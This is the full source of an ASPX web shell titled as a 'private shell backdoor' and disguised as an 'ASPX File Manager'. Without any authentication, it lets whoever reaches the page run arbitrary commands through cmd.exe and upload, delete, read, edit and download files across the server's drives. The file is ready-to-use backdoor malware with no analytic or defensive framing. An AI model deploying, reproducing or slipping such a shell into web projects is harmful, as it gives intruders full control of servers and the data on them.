[$] Pr1v473 xHeEl B4ckD00RzZ [$]
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<!DOCTYPE html>
<html>
<head>
<title>ASPX File Manager</title>
<style>
body {
background-color: black;
color: white;
font-family: Arial, sans-serif;
}
input, textarea, select {
background-color: #333;
color: white;
border: 1px solid #555;
}
a {
color: #00aaff;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
pre {
white-space: pre-wrap;
word-wrap: break-word;
}
</style>
</head>
<body>
<h1>ASPX File Manager</h1>
<%
string currentPath = Request.QueryString["path"];
if (string.IsNullOrEmpty(currentPath))
{
currentPath = Server.MapPath("~/");
}
DirectoryInfo dirInfo = new DirectoryInfo(currentPath);
if (Request.HttpMethod == "POST")
{
if (Request.Form["upload"] != null && Request.Files["fileToUpload"] != null)
{
HttpPostedFile file = Request.Files["fileToUpload"];
string savePath = Path.Combine(currentPath, Path.GetFileName(file.FileName));
file.SaveAs(savePath);
Response.Write("<p>File uploaded successfully!</p>");
}
else if (Request.Form["delete"] != null)
{
string deleteFile = Request.Form["delete"];
string deletePath = Path.Combine(currentPath, deleteFile);
if (File.Exists(deletePath))
{
File.Delete(deletePath);
Response.Write("<p>File deleted successfully!</p>");
}
}
else if (Request.Form["save"] != null)
{
string filePath = Request.Form["filePath"];
string fileContent = Request.Form["fileContent"];
File.WriteAllText(filePath, fileContent);
Response.Write("<p>File saved successfully!</p>");
}
else if (Request.Form["cmd"] != null)
{
string cmdInput = Request.Form["cmd"];
Process proc = new Process();
proc.StartInfo.FileName = "cmd.exe";
proc.StartInfo.Arguments = "/c " + cmdInput;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.StartInfo.RedirectStandardError = true;
proc.Start();
string cmdOutput = proc.StandardOutput.ReadToEnd();
string cmdError = proc.StandardError.ReadToEnd();
proc.WaitForExit();
Response.Write("<h3>Command Output:</h3>");
Response.Write("<pre>" + Server.HtmlEncode(cmdOutput) + "</pre>");
if (!string.IsNullOrEmpty(cmdError))
{
Response.Write("<h3>Command Error:</h3>");
Response.Write("<pre>" + Server.HtmlEncode(cmdError) + "</pre>");
}
}
}
if (!dirInfo.Exists)
{
Response.Write("<p>Directory does not exist.</p>");
return;
}
Response.Write("<h2>Current Directory: " + dirInfo.FullName + "</h2>");
%>
<form method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" />
<input type="submit" name="upload" value="Upload File" />
</form>
<br />
<form method="post">
<input type="text" name="cmd" placeholder="Enter command" />
<input type="submit" value="Execute Command" />
</form>
<br />
<ul>
<%
// Show root directories if no path is specified
if (string.IsNullOrEmpty(Request.QueryString["path"]))
{
foreach (string drive in Directory.GetLogicalDrives())
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(drive) + "'>" + drive + "</a></li>");
}
}
else
{
if (dirInfo.Parent != null)
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dirInfo.Parent.FullName) + "'>.. (Up)</a></li>");
}
foreach (DirectoryInfo dir in dirInfo.GetDirectories())
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dir.FullName) + "'>" + dir.Name + "</a></li>");
}
foreach (FileInfo file in dirInfo.GetFiles())
{
Response.Write("<li>" + file.Name + " - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&delete=" + file.Name + "'>Delete</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&edit=" + file.Name + "'>Edit</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&read=" + file.Name + "'>Read</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&download=" + file.Name + "'>Download</a></li>");
}
}
%>
</ul>
<%
if (!string.IsNullOrEmpty(Request.QueryString["read"]))
{
string fileToRead = Path.Combine(currentPath, Request.QueryString["read"]);
if (File.Exists(fileToRead))
{
string fileContent = File.ReadAllText(fileToRead);
Response.Write("<h3>Reading File: " + Request.QueryString["read"] + "</h3>");
Response.Write("<pre>" + Server.HtmlEncode(fileContent) + "</pre>");
}
}
else if (!string.IsNullOrEmpty(Request.QueryString["edit"]))
{
string fileToEdit = Path.Combine(currentPath, Request.QueryString["edit"]);
if (File.Exists(fileToEdit))
{
string fileContent = File.ReadAllText(fileToEdit);
Response.Write("<h3>Editing File: " + Request.QueryString["edit"] + "</h3>");
Response.Write("<form method='post'>");
Response.Write("<input type='hidden' name='filePath' value='" + fileToEdit + "' />");
Response.Write("<textarea name='fileContent' rows='20' cols='80'>" + Server.HtmlEncode(fileContent) + "</textarea><br />");
Response.Write("<input type='submit' name='save' value='Save' />");
Response.Write("</form>");
}
}
else if (!string.IsNullOrEmpty(Request.QueryString["download"]))
{
string fileToDownload = Path.Combine(currentPath, Request.QueryString["download"]);
if (File.Exists(fileToDownload))
{
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(fileToDownload));
Response.WriteFile(fileToDownload);
Response.End();
}
}
%>
</body>
</html>